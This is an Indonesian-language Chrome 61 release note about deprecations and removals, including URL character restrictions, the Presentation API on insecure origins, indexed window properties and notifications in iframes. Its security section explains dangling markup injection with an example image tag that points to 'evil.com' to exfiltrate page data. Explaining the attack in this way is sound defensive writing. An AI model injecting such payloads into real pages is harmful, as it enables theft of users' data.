Di hampir setiap versi Chrome, kami melihat sejumlah besar update dan peningkatan pada produk, performanya, dan juga kemampuan Platform Web. Artikel ini menjelaskan penghentian dan penghapusan di Chrome 61, yang masih dalam versi beta per 3 Agustus. Daftar ini dapat berubah sewaktu-waktu.
Keamanan dan Privasi
Memblokir resource yang URL-nya berisi karakter '\n' dan '<'
Ada jenis peretasan yang disebut injeksi markup menggantung, yaitu
URL yang terpotong digunakan untuk mengirim data ke endpoint eksternal. Misalnya,
pertimbangkan halaman yang berisi <img src='https://evil.com/?. Karena URL tidak memiliki
tanda kutip penutup, browser akan membaca tanda kutip berikutnya yang muncul dan memperlakukan
karakter yang diapit seolah-olah itu adalah satu URL.
Chrome 61 mengurangi kerentanan ini dengan membatasi kumpulan karakter
yang diizinkan dalam atribut href dan src. Secara khusus, Chrome akan berhenti
memproses URL saat menemukan karakter baris baru (\n) dan karakter kurang dari (<).
Developer dengan kasus penggunaan yang sah untuk baris baru dan karakter kurang dari dalam URL harus meng-escape karakter ini.
Intent to Remove | Chromestatus Tracker | Chromium Bug
Menghentikan penggunaan dan menghapus Presentation API pada konteks yang tidak aman
Telah ditemukan bahwa pada origin yang tidak aman, Presentation API dapat digunakan sebagai vektor peretasan pada origin yang tidak aman. Karena layar tidak memiliki kolom URL, API dapat digunakan untuk melakukan spoofing konten. Anda juga dapat mengeksfiltrasi data dari presentasi yang sedang berjalan.
Sejalan dengan niat Blink untuk menghapus fitur canggih di origin yang tidak aman, kami berencana untuk menghentikan penggunaan dan
menghapus dukungan untuk Presentation API di konteks yang tidak aman. Mulai Chrome
61, PresentationRequest.start() tidak akan berfungsi lagi pada origin yang tidak aman.
Intent to Remove | Chromestatus Tracker | Chromium Bug
JavaScript
Tidak mengizinkan penentuan properti yang diindeks di jendela
Sebelumnya, beberapa browser mengizinkan penetapan JavaScript seperti berikut:
window[0] = 1;
Catatan spesifikasi HTML saat ini menunjukkan bahwa ini adalah pelanggaran eksplisit terhadap spesifikasi JavaScript. Oleh karena itu, kemampuan ini dihapus di Chrome 61. Mulai Februari 2016, Firefox sudah mematuhi kebijakan ini.
Menghapus penggunaan notifikasi dari iframe yang tidak aman
Permintaan izin dari iframe dapat membingungkan pengguna karena sulit untuk membedakan antara asal halaman yang berisi dan asal iframe yang membuat permintaan. Jika cakupan permintaan tidak jelas, akan sulit bagi pengguna untuk menilai apakah akan memberikan atau menolak izin.
Tidak mengizinkan notifikasi di iframe juga akan menyelaraskan persyaratan untuk izin notifikasi dengan notifikasi push, sehingga mengurangi hambatan bagi developer.
Developer yang memerlukan fungsi ini dapat membuka jendela baru untuk meminta izin notifikasi.